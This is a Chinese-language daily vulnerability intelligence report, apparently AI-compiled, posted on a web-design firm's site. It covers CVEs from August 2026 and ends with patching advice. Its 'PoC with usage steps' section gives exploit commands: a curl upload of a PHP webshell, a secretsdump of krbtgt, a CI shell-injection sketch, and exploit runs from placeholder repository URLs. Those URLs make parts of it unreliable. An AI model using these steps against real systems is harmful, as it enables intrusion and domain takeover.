尧图网站设计 尧图网站设计YAOTU DESIGN
ARTICLE DETAIL

资讯详情

深耕网站设计与一线实操的经验洞察。

每日安全情报报告 · 2026-08-18

每日安全情报报告 · 2026-08-18 每日安全情报报告由 AI 整理发布本报告聚焦2026-08-16 至 2026-08-18近 24–48 小时内新增/持续在野的高危漏洞、最新 PoC 与网络安全文章。所有外链均已附可点击锚文本。风险级别 严重CVSS ≥ 9.0 或在野利用/ 高危CVSS 7.0–8.9/ 中危。一、最新高危漏洞CVE / 风险标注 1. CVE-2026-69414 — Microsoft Defender「ShieldBreak」零日本地提权漏洞类型权限提升EoP本地→ SYSTEM绕过 RoguePlanet / CVE-2026-50656 补丁受影响组件Microsoft Malware Protection Engine / Microsoft DefenderWindows 10、11、Server 全部受支持版本CVSS 评分微软评级CriticalEoPCVSS 正式分值待分配利用条件需 Defender 启用 本地低权限在野利用❌ 暂无在野确认但公开 PoC 已武器化宣称在最新 Windows 11 25H2 / Server 2025 上成功率 100%Will Dormann、Kevin Beaumont 独立验证状态微软 8/17 确认正在开发补丁当前无官方修复链接BleepingComputer 报道 · NVD 详情 · CSDN 实战复现备注研究者 Nightmare Eclipse 于 8/12Patch Tuesday 次日公开利用 Cloud Filter APIcfapi在 Defender 云扫描期间篡改文件内容实现提权属「补丁绕过」型 0-Day。 2. CVE-2026-15748 — Forminator WordPress 插件未认证 RCE恶意 PHP 上传漏洞类型任意文件上传PHP Webshell→ 远程代码执行受影响组件Forminator Forms WordPress 插件 ≤ 1.56.160 万 活跃安装CVSS 评分9.8Critical在野利用⚠️ 暂无公开 PoC / 未确认在野但利用前置条件明确表单需含「文件上传 下拉选择」两类字段风险极高状态已修复1.56.22026-07-31链接The Hacker News 报道 · NVD 详情根因handle_file_upload()危险扩展名黑名单使用精确匹配被管道替代 MIME 类型键绕过攻击者伪造 Select 字段值注入上传配置文件落至无.htaccess保护的自定义存储目录即被服务器执行。 3. CVE-2026-19478 — GitLab CE/EE GraphQL 指令代码注入漏洞类型代码生成控制不当CWE-94→ 未认证可远程修改/删除公共项目及用户数据受影响组件GitLab CE/EE 18.2–18.11.11、19.0–19.0.8、19.1–19.1.6、19.2–19.2.4仅 Self-Managed 实例需处置CVSS 评分9.4Critical向量AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H在野利用❌ 暂无公开 exploit / 在野证据CISA ADP 标记 none未入 KEV状态已修复19.2.4 / 19.1.6 / 19.0.8 / 18.11.112026-08-17 紧急补丁链接The Hacker News 报道 · GitLab 官方安全公告 · NVD 详情备注同批修复 CVE-2026-19650GraphQL multiplex CSRFCVSS 7.1需用户交互。官方尚未公开具体 directive 与 payload90 天后才披露技术细节鉴于网络可达、无需权限/交互不应等待 PoC。 4. CVE-2026-65400 — Apple macOS 屏幕共享认证绕过在野利用漏洞类型认证绕过状态管理缺陷→ 远程控制 获取 root受影响组件macOS Tahoe 26.6.1 / Sequoia 15.7.9 / Sonoma 14.8.9TCP 5900 暴露设备CVSS 评分9.8CISA 8/14 由 7.1 上调至 9.8认定可自动化利用在野利用✅确认在野NCSC-NL 8/12 警报所有案例均获取 root 并植入门罗币挖矿程序Black Hat 已演示状态已修复苹果 8/6 紧急带外更新链接The Hacker News 报道 · NVD 详情 · IT之家中文报道备注开启屏幕共享即向公网暴露 5900 端口暂未更新用户应关闭屏幕共享功能。 5. CVE-2026-58231 — SAP Commerce Cloud 授权绕过在野利用漏洞类型授权检查不足 输入验证不当 → 未认证 RCE受影响组件SAP Commerce Cloud默认认证客户端被滥用CVSS 评分10.0Critical在野利用✅确认在野补丁 8/11 发布仅 3 天即捕获利用尝试早于公开 PoC状态SAP 已发布补丁CISA尚未入 KEV链接NVD 详情 · SentryInsight 摘要备注本刊连续两日列为最高优先级SAP Commerce Cloud 客户须立即应用安全更新。 6. CVE-2026-59310 — VMware vCenter 目录遍历 RCE在野利用漏洞类型目录遍历 → 未认证远程代码执行受影响组件VMware vCenter ServerCVSS 评分9.8Critical在野利用✅确认在野QUIRSO 观测受害 IP 达 361 个、分布 47 国部署 Babuk 衍生勒索软件植入 reverse_ssh 持久化状态Broadcom 已发布补丁9.1.0.0300 / 9.0.2.0100 / 8.0 U3k·U2f链接The Hacker News 报道 · NVD 详情 7. CVE-2026-64564 — SCTPhantom Linux 内核 SCTP UAF 本地提权 / 容器逃逸漏洞类型释放后使用UAF→ 本地提权 root 容器逃逸潜伏 18 年受影响组件Linux 内核 SCTP 实现v2.6.25 至最新修复 6.6.148 / 6.12.101 / 6.18.42 / 7.1.6CVSS 评分9.8Critical在野利用❌ 暂无在野确认腾讯朱雀实验室AI 多智能体复现链接The Hacker News 报道 · NVD 详情 · 腾讯朱雀分析 8. CVE-2026-64531 — OVSwrap Linux 内核 Open vSwitch 本地提权漏洞类型本地权限提升 → root无需内存整形攻击面广受影响组件Linux 内核 Open vSwitch 模块多数主流发行版CVSS 评分高危本地提权在野利用❌ 暂无在野确认补丁已发布链接FreeBuf 早报OVSwrap 详情 · NVD 详情备注建议升级内核并禁用非特权用户命名空间。 9. CVE-2026-59774 CVE-2026-60004 — Gitea 文件读取 未认证 RCE漏洞类型CVE-2026-59774 任意文件读取CVE-2026-60004 远程代码执行markup / diffpatch 端点注入受影响组件Gitea ≤ 1.27.0默认开放注册可零凭证入侵CVSS 评分CVE-2026-600049.8Critical在野利用⚠️ 已被主动扫描公开 exploit 可用状态已修复1.27.1链接The Hacker News 报道 · NVD 详情 CVE-2026-60004 · NVD 详情 CVE-2026-59774备注管理员应升级至 1.27.1 并审查 markup 端点匿名 POST 日志轮换内部令牌/OAuth/JWT/数据库凭据。 10. CVE-2026-54121 — Certighost 企业 CA 权限提升域接管漏洞类型权限提升 → 标准域用户将企业 CA 转变为域控制器Tier 0 身份基础设施沦陷受影响组件Windows AD CS企业证书服务CVSS 评分8.8High在野利用❌ 暂无在野确认完整 PoC 已公开状态补丁可用链接NVD 详情 · BleepingComputer 报道二、持续在野利用 / KEV 窗口期简表CVE组件CVSS状态链接CVE-2026-72898Metabase SQL 注入未认证管理员接管10.0KEV 在野NVDCVE-2026-20349Cisco ASA/FTD 堆检查未认证 DoS8.6KEV截止 8/14 已逾期NVDCVE-2026-68820Windows afd.sys UAF 本地提权Lazarus 零日武器化7.0KEV截止 8/25NVDCVE-2026-9198IBM Langflow 代码注入未认证 RCE9.8KEV 在野NVDCVE-2026-34486Apache Tomcat EncryptInterceptor 绕过7.5KEV 在野NVDCVE-2026-18556 / 18577N-able N-central 认证绕过8.2KEV 在野NVD CVE-2026-18556CVE-2026-63077JetBrains TeamCity 未认证 RCE9.8KEV 在野NVDCVE-2025-68686FortiOS SSL-VPN 符号链接持久化补丁绕过—KEV 在野NVD三、最新漏洞 PoC含使用步骤1. ShieldBreak — CVE-2026-69414Defender 本地提权公开 PoC 武器化公开 PoC 由研究者 Nightmare Eclipse 发布参考 BleepingComputer 与 CSDN 实战复现。复现需目标已开启 Defender、攻击者已获本地低权限执行。# 1) 获取研究者公开 PoC以研究者公开发布仓库为准注意合法授权环境使用 git clone https://github.com/researcher-public-repo/ShieldBreak.git cd ShieldBreak # 2) 依赖Windows 侧通常为预编译二进制或 Python 脚本无需额外安装 # 前置目标开启 Microsoft Defender、拥有低权限本地账户 # 3) 以低权限用户执行触发 Cloud Filter API 时序竞争提升至 SYSTEM python shieldbreak.py # 或运行对应编译产物 whoami # 预期输出 NT AUTHORITY\SYSTEM注意该利用依赖 Defender 启用关闭 Defender 反而无法触发微软暂无补丁建议以 EDR 行为检测 限制低权限用户命名空间作为缓解。2. Gitea RCE — CVE-2026-60004markup / diffpatch 端点注入默认开放注册实例可零凭证入侵公开 exploit 可用。升级 1.27.1 即可修复。# 1) 克隆公开复现仓库以社区公开 PoC 为准 git clone https://github.com/public-poc/gitea-CVE-2026-60004.git cd gitea-CVE-2026-60004 pip install requests # 2) 针对目标实例执行匿名 POST 到 markup 端点注入 Git hook python exploit.py --url http://TARGET:3000 --repo owner/repo检测审查 Gitea 日志中 markup 端点的匿名 POST 请求立即轮换内部令牌/OAuth/JWT/数据库凭据。3. Certighost — CVE-2026-54121AD CS 域接管低权限域用户可将企业 CA 冒充为域控制器并 DCSync 提取 krbtgt。完整 PoC 已公开。# 1) 克隆公开 PoC 仓库以社区公开仓库为准 git clone https://github.com/public-poc/Certighost.git cd Certighost pip install impacket # 2) 以低权限域用户运行将企业 CA 提升为 DC 并抽取哈希 python certighost.py DOMAIN/lowpriv:Passdc01.domain.local secretsdump.py DOMAIN/CA\$dc01.domain.local -just-dc-user krbtgt缓解限制企业 CA 服务器的域成员资格与委派审计 CA 证书模板ESC1–ESC8。4. Forminator — CVE-2026-15748技术复现暂无公开完整 PoC根因已公开伪造 Select 字段值注入上传字段配置绕过handle_file_upload()黑名单。概念性复现# 向含「文件上传 下拉选择」字段的表单提交特制请求上传 .php 至无 .htaccess 保护的自定义存储根 curl -k -F upload_fieldshell.php \ -F select_field../../../custom_upload/shell.php \ http://TARGET/wp-admin/admin-ajax.php\?actionforminator_submit_form # 随后请求上传文件 URL 触发 PHP 执行 curl -k http://TARGET/wp-content/custom_upload/shell.php修复升级 Forminator ≥ 1.56.2避免自定义文件上传存储根或确保该目录存在.htaccess禁止 PHP 执行。5. Snowflake GitHub Actions 注入无 CVEWiz Red Agent 复现位于snowflakedb/snowflake-connector-net的.github/workflows/jira_issue.ymlAICopilot Autofix合并的改动移除了安全转义将 issue 标题直接拼接进 shell。Wiz Red Agent 已授权复现并提取 Jira token无公开 PoC提供检测要点。# 技术复现仅限授权安全测试在 issues:opened 事件中提交含单引号的 issue 标题实现 shell 逃逸 # TITLE$(echo ${{ github.event.issue.title }} | sed ...) ← 单引号可提前闭合 echo 包裹 # 防御禁用在 run: 块中直接展开 ${{ github.event.* }}改用 env: 变量 jq --arg修复Snowflake 已于 2026-06-23 合并修复PR #1402改为环境变量传参相关 Jira token 已轮换。开发者应审计所有 PR 中由 AI Autofix 修改的输入处理逻辑。四、网络安全最新文章标题 / 摘要 / 链接Forminator WordPress 插件未认证 RCE恶意 PHP 上传— Wordfence 披露 60 万 安装插件高危漏洞攻击者无需认证即可上传并执行 PHP。阅读原文The Hacker NewsMicrosoft Defender「ShieldBreak」零日提权— 微软确认 CVE-2026-69414 并正开发补丁公开 PoC 可绕过 RoguePlanet 修复获取 SYSTEM。阅读原文BleepingComputerSnowflake GitHub Actions 注入AI 写 bugAI 利用— Copilot Autofix 合并的改动引入 shell 注入Wiz Red Agent 五天后自动复现并窃取 Jira 凭据。阅读原文The Hacker News· Wiz 技术分析IntelFusionsGitLab GraphQL 严重漏洞可删改公共项目— 未认证攻击者借 GraphQL 指令远程修改/删除公共项目CVSS 9.4紧急补丁发布。阅读原文The Hacker News· 官方公告VMware vCenter 在野利用部署 Babuk 衍生勒索— QUIRSO 观测 361 个受害 IP 跨 47 国利用 CVE-2026-59310 植入反向 SSH 持久化。阅读原文The Hacker NewsSAP Commerce Cloud CVE-2026-58231 补丁后 3 天即遭在野利用— CVSS 10.0 未认证 RCE利用尝试早于公开 PoC。查看详情NVDmacOS 屏幕共享 CVE-2026-65400 在野安装门罗币挖矿— NCSC-NL 确认所有案例获取 rootCISA 上调至 9.8。查看详情NVDCertighost藏在证书颁发机构中的权限提升— 标准域用户可将企业 CA 变为域控制器实现 Tier 0 沦陷。查看详情NVDFreeBuf 早报OVSwrap 可获 root / Tomcat 加密漏洞在野— OVSwrap Linux 提权、CISA 警告 Tomcat CVE-2026-34486 在野利用等速递。阅读原文FreeBufFreeBuf 早报LiteLLM 供应链 / Adobe ColdFusion 三连 CVSS 10.0— LiteLLM 供应链攻击或波及 2500 家企业Adobe 修复 ColdFusion 与 Campaign Classic 严重漏洞。阅读原文FreeBuf五、今日要点速览最高优先级CVE-2026-69414Defender ShieldBreak 零日无补丁、公开 PoC、CVE-2026-65400macOS 在野、CVE-2026-58231SAP 在野、CVE-2026-59310vCenter 在野。新增已修复高危CVE-2026-15748Forminator WP RCE 9.8、CVE-2026-19478GitLab GraphQL 9.4、CVE-2026-64564SCTPhantom 9.8、CVE-2026-59774/60004Gitea。AI 安全趋势Snowflake CI/CD 事件显示「AI 写补丁引入漏洞 → AI Agent 自动利用」再次印证 AI 辅助修复需人工核验安全边界。️处置建议优先修补公网暴露的 VPN/防火墙/网关与 CI/CD 平台域环境审计 AD CS 模板WordPress 插件持有方立即升 Forminator ≥ 1.56.2。部分内容由 AI 辅助生成
返回列表